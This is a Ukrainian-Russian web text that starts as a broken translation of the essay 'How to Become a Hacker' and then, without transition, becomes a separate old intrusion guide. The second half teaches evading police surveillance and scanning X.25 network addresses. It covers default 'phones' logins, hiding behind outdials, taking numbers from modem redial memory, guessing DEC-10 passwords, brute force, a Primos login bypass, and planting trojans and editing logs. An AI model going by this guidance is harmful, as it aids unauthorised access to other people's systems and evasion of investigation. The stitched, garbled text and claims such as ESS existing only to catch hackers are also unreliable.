Є й інша група людей, голосно називає себе хакерами, але вони ними не є. Це ті люди (головним чином, молодь чоловічої статі), кого тяга за злом комп'ютерних та телефонних систем. Справжні хакери називають таких людей "крекерамі" і не бажають мати з ними нічого спільного. Справжні хакери в більшості своїй вважають крекеров лінивий, безвідповідальними і не дуже розумними. Те, що людина здатна зламати систему безпеки, не робить його хакером, точно так само, як вміння угоняют тачки не робить вас автомобільним майстром. На жаль багато журналісти та письменники введені в оману і використовують слово "хакер" для опису крекеров, і це нескінченно дратує справжніх хакерів.
Головне розходження в наступному: хакери будують речі, а крекери їх ламають.
Якщо ви хочете стати хакером, то продовжуйте читання. Якщо ви хочете стати крекером, то прямуйте читати Ньюз-групу alt.2600і оголосіте відсидіти від п'яти до десяти років у в'язниці, коли виявите, що не настільки вправно наскільки вважали.

наверх
Хакерська підхід.

Хакери вирішують проблеми і будують речі, вони вірять в свободу і в добровільну взаємодопомогу. Для того, щоб вас сприймали як хакера, ви повинні вести себе так, як якби це була ваша власна позиція. А для того, щоб вести себе так, ніби це ваша позиція, ви повинні дійсно вірити в цю позицію.
Але якщо ви розраховуєте культивувати хакерських підходи лише для отримання визнання в культурі, то ви упустили суть.
Стати такою людиною, хто вірить в подібні речі - це важливо для вас, тому що це допоможе вам навчитися і підтримає прагнення. Як і в будь-якому іншому творчості, найефективніший спосіб стати майстром - це наслідувати світогляду майстрів, не тільки інтелектуально, але й також емоційно.
Так що якщо ви хочете стати хакером, то повторюйте наступні речі, поки не повірите в них:
 Світ сповнений чарівною проблем, що чекають свого рішення.
Бути хакером - це величезне задоволення, але це задоволення такого роду, яке вимагає маси зусиль. Для таких зусиль потрібна мотивація. Атлети-чемпіони черпають мотивацію з свого роду фізичного задоволення, одержуваного від доведення власного тіла до досконалості, від подолання власних фізичних меж. Подібно до цього, щоб бути хакером ви повинні отримувати максимум задоволення від рішення проблем, від оттачіванія своїх навичок, від тренування свого інтелекту.
Якщо ж ви не з тих, хто відчуває подібні речі природним чином, то вам знадобиться стати таким, щоб зробитися хакером. В іншому випадку ви виявите, що вся ваша Хакерська енергія вичерпана такими подразників, як секс, гроші і успіх в суспільстві.
Ви також повинні розвинути щось віри у ваші власні здібності до навчання. Віри в те, що навіть якщо ви можливо і не знаєте всього, що необхідно для вирішення проблеми, але якщо ви освоїли лише шматочок і на цьому навчилися, то вже знаєте достатньо, щоб вирішити і наступний шматок - і так далі, поки все не буде зроблено.
 Ніхто і ніколи не повинен вирішувати проблему двічі.
Творчі мізки - це цінний і обмежений ресурс. Не слід розтрачує їх на переізобретеніе колеса, коли навколо чекає так багато чудових нових проблем.
Щоб поводитися як хакер, ви повинні вірити, що час роздумів інших хакерів - дорогоцінне, причому настільки, що майже моральним боргом для вас є поділитися інформацією. Вирішити проблеми, а потім просто роздати рішення, щоб інші хакери могли вирішувати нові проблеми замість того, щоб беспрестанно повертатися до старих.
Від вас не потрібно вірити, що ви зобов'язані роздати всі плоди своєї творчості, хоча ті хакери, хто так робить, - найбільш шановані серед інших хакерів. З цінностями хакеров цілком узгоджується продаж плодів творчості, достатній для забезпечення вас їжею, покровом і комп'ютерами. Узгоджується це і з використанням ваших хакерських навиків для підтримки сім'ї і навіть для того, щоб розбагатіти, поки займаючись цим ви не забуваєте, що є хакером.
 нудьга і рутина - це зло.
Хакери (і взагалі творчі люди) ніколи не повинні займати нудними речами або погрязать в рутині монотонної роботи, тому що коли це відбувається, то це означає, що вони не роблять того, що можуть робити лише вони - вирішувати нові проблеми. Подібне марнотратства шкодить кожному. Тому нудьга і рутина - це не просто неприємні речі, це зло.
Щоб поводитися як хакер, ви повинні вірити в це так, щоб бажати автоматизації всіх нудних дрібниць настільки, наскільки це можливо, і не тільки для себе, але і для всіх (особливо для інших хакерів).
Але іноді хакери займаються речами, які можуть здатися монотонних або нудними сторонньому спостерігачеві, в якості вправи для прочищення мізків або ті ж для вироблення навика.Лібо ж для придбання особливого роду досвіду, який неможливо отримати іншим шляхом. Але все це робиться за власним вибором, ніхто з вміють думати ніколи не повинен примушувати до нудною роботі.
 Свобода - це благо.
Хакери за своєю природою антіавторітарни. Будь-хто, хто може віддати вам наказа, може зупинити рішення вами будь-який з проблем, вас зачарувати. І, враховуючи образ мислення авторитарних мізків, знайдуться які-небудь приголомшливо ідіотські причини, щоб це зробити. Так що з авторитарним підходом слід битися усюди, де ви його зустрінете, щоб він не душив вас і інших хакеров.
Це не те ж саме, що боротися з усіма владою. Дітям потрібно керівництво, злочинність потрібно стримувати. Хакер може погоджуватися на ухвалення якогось роду керівництва, коли є можливість отримати те, що потрібно і не надто багато часу витрачатися на виконання наказів. Але це обмежена розумна операція, щось подібне до особистої поступки.
Авторитаризм процвітає в умовах цензури і секретності. Його адепти не вірять в добровільну співпрацю і в ділення інформацією, їм подобатися тільки таке "співробітництво", яким керують вони. Тому, щоб поводитися як хакер, ви повинні виробити в собі інстинктивні неприйняття цензури, секретності, а також застосування сили або брехні для примушення відповідальних дорослих людей. І діяти необхідно виходячи з такої віри.
 Позиція не замінить компетентність.
Для того, щоб бути хакером ви повинні розвинути деякі з перерахованих підходів. Але вхопити лише підходи ви спроневіритеся хакером не в більшою мірою, чим спортсменом-рекордсменом або рок-зіркою. Для того, щоб стати хакером, потрібен інтелект, практика, самовідданість і тяжка праця.
Тому вам доведеться навчитися з недовірою ставитися до позиції, але з повагою до компетентності будь-якого роду. Хакери не дозволяють позерам розтринькувачів їх час, але вони поклоняються компетентності, особливо хакерской компетентності, але компетентність хороша в чому завгодно. Особливо цінується володіння такими необхідними навиками, які мало у кого є. А найкраще - це компетентність в таких навичках, які вимагають проникливо розуму, вправності і концентрації.
Якщо ви боготворить компетентність, то ви отримуєте насолоду, розвиваючи її в собі. Тяжка праця і відданість стануть для вас захоплюючою грою, а не рутиною. І це життєво необхідно для того, щоб стати хакером.

наверх
Основні навички.

Хакерська погляд на життя - це важливо, але майстерність - багато разів важливіше. Позиція не замінить компетентності, і існує певний набір базових навичок, якими вам необхідно володіти, перш ніж будь-який з хакерів те подумав назвати хакером і вас.
Цей базовий набір з часом потихеньку змінюється у міру того, як технологія породжує нові навики і робить непотрібними застарілі. Наприклад, зазвичай згадувалося програмування на машинному мовою, але аж до недавнього часу в набір не включали мову HTML. Однак, в сьогоднішній комплект цілком безумовно входять наступні компоненти:
 Навчитеся програмувати.
Це, звичайно ж, фундаментальний Хакерська навичку. Якщо ж ви не знаєте жодного комп'ютерного мови, рекомендуємо почати з мови Python. Він зрозуміло розроблений, добре документовано і відносно доброзичливців до новачків. Незважаючи на те, що він гарний для першого мови, це не просто іграшка. Це потужний і гнучкий мову, добре підходить для великих об'єктів.
Але знайте, що ви не зможете хакерському рівня майстерності (або рівня хорошого програміста), якщо будете знати тільки одну мову програмування. Вам необхідно навчитися мислити про проблеми програмування взагалі, незалежно від будь-якого конкретного мови. Щоб бути справжнім хакером, вам треба досягти рівня, на якому ви зможете вивчити нову мову за декілька днів, співвідносячи положення керівництва з тим, що вам вже відомо. Це означає, що вам слід вивчити декілька дуже різних мов.
Якщо ви займаєтеся серйозним програмуванням, то вам доведеться вивчити Сі, основну мову операційної системи Unix (хоча це і не та мова, який слід намагатися вивчити першим). Інші мови першорядної важливості для хакерів - це Perl та Lisp. Мова Perl має сенс вивчити з практичних міркувань: він дуже широко використовується для активних Web-сторінок і системного адміністрування, так що навіть якщо вам і ніколи не доведеться писати на Perl, ви повинні навчитися його читати. Lisp варто вивчити ради тих глибоких освічених знань, які ви знайдете, коли нарешті його освоїте. Ці пізнання зроблять вас прекрасним програмістом на все життя, навіть якщо ви ніколи особливо і не будете використовувати сам Lisp.
Найкраще, на самом деле, вивчити всі чотири цих мови (Python, C, Perl та Lisp). Крім того, що це найважливіші хакерських мови, вони демонструють дуже різні підходи до програмування і кожен з них навчить вас цінним речам.
Ми не можемо дати тут розгорнуті інструкції щодо того, як навчитися програмувати - це складне мистецтво. Але можемо сказати вам, що книги і курси цьому не навчать (багато, можливо, більшість хакерів - це самоучка). Що цьому учить, так це читання кодів і написання кодів.
Навчитися програмувати - це як навчитися писати гарним природним мовою. найкращий спосіб для цього - почитати щось з написаного майстрами, потім написати трохи самому; прочитати більше, написати трохи більше; прочитати ще більше, написати ще більше ... І повторювати цей процес до тих пір, поки ваші програми не разовьются в щось потужне і економічне.
Відшукати хороші коди для читання раніше було складно, тому що було дуже мало великих програм, доступних у вихідних кодах і придатних для вивчення і виникає юних хакерів. Нині ситуація кардинально змінилася: програми в початкових кодах, программістскій інструментарій та операційні системи тепер широко доступні. Тому ...
 Дістаньте один з варіантів Unix в початкових кодах, навчіться його використовувати і з ним працювати.
Вважаємо, що ви маєте персональний комп'ютер або можете отримати до нього доступ. Єдиний і найважливіший крок, який будь-який з новачків може зробити для придбання хакерських навиків, - це роздобути копію Linux або одній з версій BSD-Unix, встановити її на персональній машині і запустити.
Так, в світі є і інші операційні системи окрім Unix. Але їх поширюють в двійковому вигляді - ви не зможете читати коди і не зможете їх модифікувати. Вчитися хакерством на машинах під DOS, Windows або MacOS - це все одно, що вчитися танцювати повністю загіпсованним.
Крім того, Unix - це операційна система Internet. Хоча ви можете навчитися використовувати Internet і не знаючи Unix, але ви не можете бути Internet-хакером, не розуміючи Unix. З цієї самої причини сьогоднішня Хакерська культура є досить сильно Unix-сконцентруватися. (Це не завжди було так, і деяким з колишніх хакерів таке положення справ не дуже до вподоби, але симбіоз між Unix та Internet став настільки міцний, що навіть сили Microsoft не вистачає, щоб серйозно на це вплинути).
Так що заводить собі Unix, найкраще Linux, але є й інші варіанти (ви можете працювати як під Linux, так і під DOS / Windows на одній і тій же машині). Вивчите цю ОС. Працюйте з нею. Возітесь з нею. Спілкуйтеся через неї з Internet. Читайте коди. Модифікує їх. Ви отримаєте такий программістскій інструментарій (включаючи C, Lisp і Perl), про який кожна з ОС Microsoft і не мріяла. Ви отримаєте задоволення, і ви засвоїте більше знань, ніж припускали в процесі навчання, коли оглянитесь на цей процес вже будучи майстром-хакером.
 Навчитеся використовувати World Wide Web і писати на HTML.
Більшість з тих речей, що створені хакерской культурою роблять свою справу невидимо, допомагаючи працювати фабрикам, установам і університетам без скільки-небудь помітного впливу на життя не-хакерів. WWW - це одне велике виключення, гігантська блискуча Хакерська іграшка, яка навіть по визнанню політиків змінює світ. Лише з однієї цієї причини (а також і безлічі інших приємних причин) вам слід навчитися працювати з Web.
Це не означає, що потрібно просто навчитися керувати браузером (це будь-який вміє), але й навчитися писати на HTML, мові розмітки документів Web. Якщо ви ще не вмієте програмувати, то писання на HTML навчить ваше мислення деяким корисним звичкам, які стануть у нагоді при освоєнні мов програмування. Так що робіть домашню сторінку. Але просте володіння домашньої сторінки навіть і близько не поведе вас до того, щоб стати хакером. У Web повним-повнісінько домашніх сторінок. Більшість з них - це безглуздий, непрацюючий мотлох. Вкрай кидка і привабливо оформлений непотріб, безперечно, але все одно непотріб.
Щоб бути стоящей, ваша сторінка повинна мати "контент" - зміст. Вона повинна бути цікавою та / або корисною для інших хакерів.

наверх
Хакерська культура.

Як і більшість культур без грошової економіки, Хакерландія будується на репутації. Ви намагаєтеся вирішити цікаві проблеми, але наскільки вони цікаві, і наскільки хороші ваші рішення, - це щось таке, про що зазвичай можуть судити тільки (у технічному сенсі) рівні вам або що перевершують вас.
Таким чином, коли ви граєте у хакерському гри, ви вчитеся вести рахунок головним чином по тому, що думають про вашу майстерність інші (саме тому ви не будете хакером до тих пір, поки вас не стануть так називати інші хакери). Даний факт затеняют як образ хакера-одинака, так і певні табу Хакерська культури, не допускають, щоб чиєсь его чи зовнішні визнання взагалі могли бути мотивацією для хакера.
Зокрема Хакерландія - це те, що антропологи називають "культурою дарів". Ви заробляєте статус і репутацію не тим, що керувати іншими людьми, і не тим що прекрасні, і не тим, що є речі, які є предметом жадання інших. Але швидше тим, що роздає речі. Зокрема, одарівая своїм часом, своєю майстерністю і результатами своєї творчості.
Є п'ять основних типів речей, які ви можете робити, щоб вас поважали хакери:
 Пишіть програм з відкритим вихідним кодом.
Перше - це писати програми, які інші хакери вважають забавними або корисними, і роздавати початкові коди програм для використання всієї хакерской культурою.
Таку роботу називали "вільно-доступним програмним забезпеченням" (free software), але це приводить у замішання деяких людей, точно не розуміють, що мається на увазі за словом "вільно-доступне". Тепер для такого програмного забезпечення багато хто воліє використовувати термін "з відкритим вихідним кодом" або "Open-source software". Найбільш шанованих напівбоги Хакерландіі - це люди, які написали великі і талановиті програми, що відповідають найширшим потребам, і які роздали їх всім, так що кожен тепер їх використовує.
Допомагайте тестувати і отлажівать програми з відкритим вихідним кодом.
Почитаемы также те, кто тестирует и отлаживает программы с открытым исходным кодом. В этом несовершенном мире мы неизбежно затрачиваем самую большую часть времени разработки программы на фазу отладки. Именно поэтому любой думающий автор программ с открытым кодом скажет вам, что хорошие бета-тестеры (знающие, как внятно описать симптомы, хорошо локализующие проблемы, способные исправлять опечатки и применяющие несколько простых диагностических подпрограмм) ценятся на вес золота. Всего один такой человек может превратить фазу отладки из затянутого изнуряющего кошмара в просто полезную задержку.
Если вы новичок, то попытайтесь найти разрабатываемую программу, которая вам интересна, и станьте хорошим бета-тестером. Существует вполне естественный путь продвижения от помощи в тестировании программ к помощи в их отладке и далее к помощи их модификации. Вы многому научитесь таким способом и породите добрую карму в отношениях с людьми, которые помогут вам впоследствии.
Публикуйте полезную информацию.
Еще одна хорошая вещь - отбирать и накапливать полезную и интересную информацию на Web-страницах или документов типа ЧаВО (FAQ или "часто задаваемые вопросы и ответы"), и делать их общедоступными.
Ведущие основных технических ЧаВО почти столь же уважаемы, как и авторы программ с открытым исходом кодом.
Помогайте поддерживать работу инфраструктуры.
Хакерская культура (и инженерная разработка Internet) основана на добровольцах. Имеется масса необходимой, но не особо эффективной работы, которую нужно делать, чтобы поддерживать процесс: администрирование рассылочных листов, модерирования новостных групп, управление большими архивами программного обеспечения, разработка RFC и других технических стандартов.
Люди, хорошо делающие такого рода вещи, глубоко уважаемы, поскольку каждый знает, что подобная работа требует кучу времени и не так забавна как игры с кодами. Это работа свидетельствует о самоотверженности.
Служите самой хакерской культуре.
Наконец, вы можете служить и распространять саму культуру. Но этим не стоит заниматься до тех пор, пока вы не поваритесь в этом достаточное время и не станете хорошо известны благодаря одной из четырех первых вещей.
В хакерской культуре нет явных лидеров, но здесь есть "культурные герои", "племенные старейшины", историки и ораторы. Когда вы достаточно долго поживете в этих траншеях, то сможете вырасти в одного их таких людей. Но остерегайтесь: хакеры настороженно относятся к своим крикливым племенным старейшинам, так что видимое достижение такого рода славы таит в себе опасность. Вместо того, чтобы стремиться к этому, вам лучше как бы не заботиться об этом и тогда это само упадет на колени, а уж затем можно стать скромным и милостивым в своем статусе.

наверх
Хакер - "придурок"?

Вопреки расхожему мифу, вам не обязательно быть придурком, чтобы быть хакером. Это, однако, помогает, и многие хакеры действительно "придурки". Статус изгоя общества помогает вам оставаться сосредоточенными на действительно важных вещах, таких как размышление и хакерство.
Именно по этой причине многие хакеры носят ярлык "придурок" и даже используют в качестве знака доблести более грубый термин "кретин" - это их способ декларации своей независимости от общепринятых в обществе оценок.
Если вы способны в достаточной степени сосредоточиться на хакерстве, достигать здесь заметных результатов и при этом иметь личную жизнь - что ж, прекрасно. Сегодня это намного легче. Культурный мейнстрим стал теперь намного дружелюбнее к техно-придурком . Есть даже растущее количество людей, обнаруживающих, что хакеры зачастую могут быть вполне качественными любовниками и супругами.
Если же вас влечет к хакерству по той причине, что у вас нет личной жизни, что ж, и это неплохо. По крайней мере, у вас не будет проблем с концентрацией. А личная жизнь - как знать, может она придет позже.

Искусство взлома.

Хакинг - это искусство взлома всевозможных систем и доведение данного процесса до высот технического изящества. Хакер вооружается различными методиками, исходя из которых он строит собственную стратегию взлома той или иной программы. Зачем же быть хакером? Вы наверняка найдете для себя несколько причин. Для некоторых, например, это в первую очередь просто прекрасное развлечение. Но сейчас заниматься хакингом становиться все более опасно, поэтому будьте осторожны, даже если у вас нет противозаконных намерений. Это очень трудоемкое и к тому же рискованное дело. Так что будьте внимательны и не попадитесь.
Как не пойматься?
Жизнь прекрасна, только когда вы не попадетесь в руки спецслужб. Конечно, это зависит от того, чем вы занимаетесь. Но может получиться так, что вы все равно попадетесь, несмотря на беспрекословное выполнение следующих рекомендаций.
Некоторые операторы спецслужб очень настойчивы, и не остановятся, пока не вычислят и не прижмут вас к стенке. И если, как только вы берете трубку телефона, мгновенно подключаются модемы или если до вас доходят слухи, что друзья-приятели называют вас "хакером, на след которого напали спецслужбы", то лучше вам затаится на какое-то время и не заниматься взломом.
Существует несколько основополагающих моментов, которые обязан знать каждый, использующий модем при компьютерном взломе. Вы постоянно должны быть начеку и следить за появлением таких настораживающих явлений, как:
1. Необычные шумы на линии, при том, что обычно их не бывает.
2. По телефонной линии прослушиваются другие голоса.
Это иногда случается со старым оборудованием FDM, но может быть вызвано и ответвлением провода.
3. Появление фургона, припаркованного рядом с:
а) телефонным столбом;
б) подземным паровым вентиляционным отверстием.
Если вы заметили что-нибудь из вышеуказанного, прекращайте все упражнения по крайней мере на месяц. И обязательно убедитесь, что фургон уехал, а не просто поменял место парковки.
Обратите внимание на провода, протянутые от фургона к телефонному столбу или вентиляционному отверстию. Также следует выяснить не принадлежит фургон телефонной компании.
4. Наличие незнакомого вам оборудования в нежилых комнатах вашего дома обязательно должно вас насторожить.
5. С вашей телефонной линией происходит что-то странное, и вы уверены в том, что соседи не имеют к этому никакого отношения.

наверх
Ответвление провода.

На сегодняшний день этот способ вычисления хакеров остается самым распространенным. Выявить отклонение провода можно так. Если вы в состоянии позволить себе приобрести соответствующее оборудование, то сможете заниматься тем, что называется "чистка" телефонной линии. Еще во время телефонного разговора напряжение резко падает, то означает, что от вашего телефона ответвлен провод или кто-то подключился к линии. Возможные показания прибора:
Напряжение, которое должно вас насторожить - 90V при 20-30Hz
На линии - 30-50V
Среднее напряжение- 600V. В модеме может сгореть MOV. Обычно при таком напряжении телефонная сеть неисправна.

наверх
Определение номера.

Спецслужбы используют еще один способ определения местонахождения хакера. На сегодняшний день вычисление телефонного номера стало доступным практически каждому. Недавно было обнаружено, что если набрать 33 на некоторых телефонах, то на аппарате высветится номер последнего звонка.
И полиция пользуется именно такими телефонами для вывода вас на чистую воду. Но все это, в основном, касается радиотелефонов, а не обыкновенных городских линий. Радиотелефонная связь всегда была известна своей надежностью, но, конечно же, не сейчас: Потому что такая телефонная станция - одно из самых лучших мест для занятия хакингом. Но лучше не предпринимайте ничего подобного в своем доме. Самое подходящее для хакинга время - ночь, когда дежурный оператор спецслужб наверняка спит.

наверх

Считывание RFI.

Это один из новейших способов вычисления хакеров, но его-то не стоит бояться. Для выполнения он слишком сложен, и к тому же не всегда срабатывает. Особенно если вы находитесь в окружении телевизоров и мониторов. Считывание RFI осуществляется с помощью устройства, которое ловит слабые радиочастоты вашего монитора и переводит их в видеосигналы. И если это срабатывает, то оператор видит на своем компьютере изображения с вашего монитора. Все это, конечно, впечатляет, но этот оператор еще должен сначала поймать ваш сигнал.

наверх
Система ESS.

Ко всем радостям прибавляется еще одна - Standardized Switching (или ESS). Когда ее вводили, то говорили, что она нужна для разгрузки телефонной линии. Но единственная цель этой системы - ловить хакеров. Это единственное к чему она предназначена, и надо сказать, что делает это она очень неплохо. С ее помощью телефонная компания может вычислить любой номер за 55 секунд. В системе регистрируются записи всех телефонных звонков, в том числе и местных. И даже если ваш телефон не исправен, то ваша попытка с него куда-то позвонить станет тут же известна полиции. Но эта система еще не конец света.

Хакерская этика.

Пока существует компьютер, существуют и хакеры. В 50-х годах в массачусетском институте технологии (MIT) студенты посвятили много времени и энергии изобретению компьютеров. Правила и закон игнорировались. Так как их привели в восторг итоги исследований, так наши исследования приводят в восторг и нас. Торжество хакера заключается не в нарушении закона, а в волнующем процессе исследования и накопления знаний. Некоторые рекомендации, чтобы не попасть в неприятное положение, но чтобы не повредить те компьютеры, которые станут объектом вашего профессионального внимания:
 Не вредить преднамеренно ни одной системе.
 Не изменять никаких системных файлов, кроме необходимых вам для дальнейшего доступа (троянские кони, изменения в старых логах и т.п.)
 Не оставлять никаких настоящих данных в системах, взломанных вами (перед использованием нового программного продукта по взлому необходимо проверить, не оставляет ли он ваш ID там, где вы побывали)
 Не оставлять ваш реальный номер телефона никому, кого вы не знаете.
 Не трогать правительственные компьютеры.
 Наконец, вы должны понять, что можете прочесть все пособия в мире и прослыть знатоком, но пока вы не начнете реально работать, все ваши знания равны нулю.
Одно из самых безопасных мест для начала хакерской карьеры - компьютерная система института. Университетские компьютеры имеют слабую защиту, и часто используются хакерами, поскольку каждый компьютер используется множеством людей, мало вероятно, чтобы вас реально вычислили среди юзеров, если вы были обнаружены.

наверх
Сеть Telnet..

Лучшее место для тренировок начинающего хакера - одна из больших сетей типа Telnet. Почему? Во-первых, на сетях имеется огромное разнообразие компьютеров, есть из чего выбирать. Во-вторых, сети довольно хорошо продокументированы. Проще найти кого-то, кто может вам помочь с проблемой Telnet, чем искать помощи относительно вашего местного компьютера колледжа или средней школы. Третье, сети более безопасны. Из-за огромного числа запросов, которые приходят каждый день по большим сетям, фактически тяжело отследить, откуда и какой запрос сделан. Также очень просто маскировать ваше проникновение, используя сеть, которая делает ваше хобби намного безопасным.
Telnet имеет большое количество компьютеров, соединенных в сеть, чем любая другая система в мире, от Telnet вы можете иметь доступ к Tymnet, ItaPAC, Janet, DATAPAC, SBDN, PandaNet, THENET и целому набору других сетей.
Первый шаг, который вы должны сделать, идентифицировать ваш местный порт дозвона. Сначала вы получите подсказку, говорящую:
ТЕРМИНАЛ=
Это - ваш type терминала. Если вы имеете vt100 эмуляцию, напечатайте это в ответ на запрос. Или нажмите возврат, и она станет стандартной установкой для режима терминала ввода-вывода.
Теперь вы получите подсказку в виде значка @. В ответ напечатайте:
@c mail
и затем будет запрос об имени пользователя. Введите "phones" для имени пользователя. Когда система запросит пароль, введите снова "phones". Начиная с этого момента, это - управляемое меню. Используйте его, чтобы определить ваш общий dialup. Когда вы вызываете ваш local dialup, вы еще раз пройдете запрос:
ТЕРМИНАЛ=
и еще раз вы будете представлены перед @. Эта подсказка сообщает, что вы соединены с Telnet PAD. PAD обозначает или Ассемблер/дизассемблер пакета (если вы говорите с инженером), или Public Access Device (если вы говорите с представителями маркетинга Телнета). Первое описание более правильно.
Telnet работает, собирая данные, которые вы вводите на PAD с которым вы соединены, связывая информацию в куски по 128 байтам (обычно, но цифра может быть изменена), и затем передавая их на скорости в пределах от 9600 до 19200 бода на другой, который получает данные и передает их компьютеру или системе, с которой имеется соединение. Изначально, PAD позволяет соединить два компьютера, которые имеют различные скорости или протоколы связи, на длинном расстоянии. Иногда можно заметить запаздывание в отдаленном ответе машин. Это называется Задержкой PAD, и предназначено для ожидания, пока вы пошлете данные через несколько различных линков.
Что вы делаете с этим PAD? Вы используйте его, чтобы соединиться с отдаленными компьютерными системами, печатая "С" для соединения и затем Сетевой Адрес Пользователя (NUA) системы, к которой вы хотите идти.
Если нет возможности соединения, вы получите сообщения типа:
refused collect connections
в сопровождении кодов ошибки, идущих справа, и система вернет вас в @ prompt.
Имеются два пути, чтобы двигаться в обход сообщения - Refused Collect. Первый - использование сетевого ID пользователя (NUI). NUI - это имя пользователя/pw комбинация, которая подобно кредиту по открытому счету на Telnet.
Второй способ соединение состоит в том, чтобы использовать частный PAD или через что-нибудь подобное Netlink от Главного компьютера. Префикс в Telnet NUA часто (но не всегда) относится к телефонному коду города, где находится компьютер (то есть, 713ххх обозначало бы компьютер в Хьюстоне, штат Техас). Если специфическая область, интересующая вас, например Нью-Йорк (код 914), вы можете набрать:
@C 914 001
Если соединение прошло, вы получите сообщение об этом и перейдете к 914 002. Делайте это, пока не найдете интересных систем для занятия ими.
Не все системы находятся на простом ххх ууу адресе. Некоторые составлены из четырех или пяти цифр (914 2354), а некоторые имеют десятичные или числовые расширения (422 121А = 422 121.01). Вы можете заниматься ими, но вы никогда не знаете, что можете найти.
Полное сканирование префикса займет десять миллионов вариантов. Например, если нужно просмотреть 512, то необходимо начать с 512 00000.00 и пройти до 512 00000.99, а затем увеличить адрес на 1 и пройти от 512 00001.00 до 5120001.99.
Имеется множество компьютеров для просмотра с тремя номерами, так что не стоит заниматься безумством с большими расширениями.
Иногда при попытке соединения будет проходить одна или две минуты ожидания. В этом случае, вы можете прервать связь посредством жесткого разрыва, затем, после того, как вновь система выдаст
@ prompt
Наберите "D" для отсоединения.
Outdials.
Кроме компьютеров, NUA может подключить вас к некоторым другим вещам.
Одна из наиболее полезных - outdial. Outdial, это не более чем модем, которым можно заняться по telnet - подобно концепции преследования PC, за исключением того, что тут не используются пароли.
После соединения, вы получите сообщение, подобное
Hayes 1200 bode outdial, Detroit, MT
или
VEN-TEL 212 Modem
или, возможно
Session 1234 established on Modem 5588
Лучший способ выяснить команды состоит в том, чтобы напечатать "H" или "Help" - это даст вам всю информацию, которая вам необходима.
Подсказка по безопасности: когда будете взламывать какую-нибудь систему через телефонный дозвон, всегда используйте outdial или diverter, особенно, если это местный номер. Многие люди занимаются хакингом на местных компьютерах.
Другая хорошая уловка, которую вы можете применить с outdial - использования повторного набора или функцией макрокоманды, которую многие из них имеют. Первая вещь, которую надо сделать после соединения, вызвать "Повторный набор последнего номера" (Redial last number). Это будет номер того человека, который использовал канал до вас. Запишите его, поскольку никто не вызвал бы номер без наличия компьютера на нем. Это - хороший способ найти новые системы для хакинга. Для VENTEL-модема наберите "D", и вам будет показано пять номеров, сохраненных как макрокоманды в памяти модема.
И наконец, вы можете соединяться с тем, что называется "X.25 Communication PAD", получив несколько больше материала, сопровождаемого подсказкой @. Это PAD точно такой же как тот, с которым работаете вы, за исключением того, что все предпринятые подключения объявляются PAD, позволяя вам соединяться теми узлами, которые ранее отказались от подключения.
Когда пакет передан от Pad к Pad, он содержит заголовок, в котором размещена информация о вашем местоположении. Например, когда вы вначале соединяетесь с Telnet, вам может быть сообщено
212 44A Connected
если вы звоните с кода города 212. Это означает, что вы вызвали номер 44A PAD в 212 области.
21244A будет поставлено на заголовке всех отправляемых пакетов.
Как только вы соединяетесь с частным PAD, все пакеты, выходящие от вас будут иметь этот адрес на них, но не ваш. Это может быть достаточным буфером между вами.

наверх
Идентификация ОС.

Не имеет значения, как вы нашли компьютер, это могло произойти через сеть, или могло при помощи сканирования телефонного префикса вашей университетской сети. Здесь не будет объясняться, что можно сделать, как только вы окажитесь внутри какой-либо операционной системы. Здесь будет рассказано как идентифицировать и распознать некоторые операционные системы и как приблизиться к хакингу в них, как иметь дело с тем, чего вы никогда не видели прежде.
VMS.
VAX компьютер создан Digital Equipment Corporation (DEC), и выполняет VMS (виртуальная система памяти) операционную систему.
VMS определяется по подсказке:
USENAME
Она не будет сообщать вам, если вы ввели неправильное имя пользователя, и отсоединит вас после трех неудачных попыток входа в систему. Также она следит за всеми неудачными попытками входа в систему и сообщает владельцу учетную запись при его следующем выходе в сеть.
Это - одна из наиболее безопасных операционных систем, что касаемо защиты от внешнего проникновения, но и здесь имеется много уловок для обхода защиты. VAX также имеет лучший набор справочных файлов. Только наберите "HELP" и читайте.
DEC-10.
DEC-10 более ранние модели оборудования компьютера DEC, запускающие TOPS-10 операционную систему. Эти машины могут быть опознаны по подсказке ".".
Серия DEC-10/20 весьма дружественна к хакерам, позволяя ввести несколько важных команд без какой-либо регистрации в системе. Отчетность находится в формате [xxx, yyy], где xxx и yyy - целые числа. Вы можете получить листинг отчетности и имен процесса каждого на системе перед регистрацией при помощи команды .systat (для системного состояния). Если учетная запись читается как [234, 1001] BOB JOINS, то можно попробовать набрать BOB или JOINS или эти два слова вместе для пароля на этой учетной записи. Чтобы войти вы печатаете:
.login xxx, yyy
и затем, после запроса набираете пароль.
Система позволит вам неограниченные попытки проникновения и не сохранит отчеты о неудачных попыток входа в систему. Также она сообщит вам, если UIC, который вы пробуете (UIC - код идентификации пользователя) не правилен.
UNIX.
Имеется множество различных машин на которых установлен UNIX.
В то время как некоторые могли бы доказать, что это не лучшая операционная система в мире, она наиболее широко используема. Система UNIX будет обычно выдавать подсказку наподобие
login:
в строчных буквах. UNIX также даст вам неограниченные попытки при регистрации (в большинстве случаев), и не имеется обычно никакого журнала, сохраняющего неудачные попытки.
Prime.
Компьютеры фирмы Prime, как правило, используют операционную систему Primos. Ее очень просто определить по надписи:
Primecon 18.23.05
или чего-то подобного, в зависимости от версии операционной системы. Обычно система не будет предлагать никакой подсказки. Там, где появилась эта надпись, наберите
login
Если это версия до 18.00.00 Primos, вы можете нажимать связку ^C для пароля. К сожалению, большинство людей использует версии 19+. Primos также располагает хорошим набором справочных файлов. Одна из наиболее полезных особенностей Prime на Telnet - устройство NETLINK. Как только вы - внутри, напечатайте "NETLINK", и следуйте указанием справки. Это позволит соединяться с NUA'S во всем мире используя команду "nc".
Например, чтобы соединиться с NUA 026245890040004, вы должны набрать
@nc: 026245890040004
в подсказке netlink.
HP-x000.
Эта система сделана Hewlett-Packard. Их характерная подсказка ":".
HEWETT-PACKARD имеет одну из более сложных последовательностей входа в систему извне - вы набираете:
HELLO SESSION
NAME, USERNAME, ACCOUNTNAME, GROUP
Некоторые из этих полей могут быть оставлены пустыми во многих случаях. Так как любые или все эти поля могут быть запаролены, это не самая простая система для проникновения, если бы не факт, что имеется обычно некоторая отчетность вокруг без паролей. Вообще, если значения по умолчанию не работают, вы будете должны применить грубую силу, используя обычный список пользователей. Hp-x000 выполняет MPE операционную систему, подсказка для нее будет ":", точно так же как подсказка входа в систему.
IRIS.
IRIS создан для Interactive Real Time Information System (интерактивная информационная система в режиме реального времени). Первоначально она выполнялась на PDP-11'S, но теперь выполняется на многих других мини ЭВМ. Вы можете определить Айрис по заголовку
Welcome to "IRIS" R9.1.4 Timesharing
и подсказке
ACCOUNT ID?
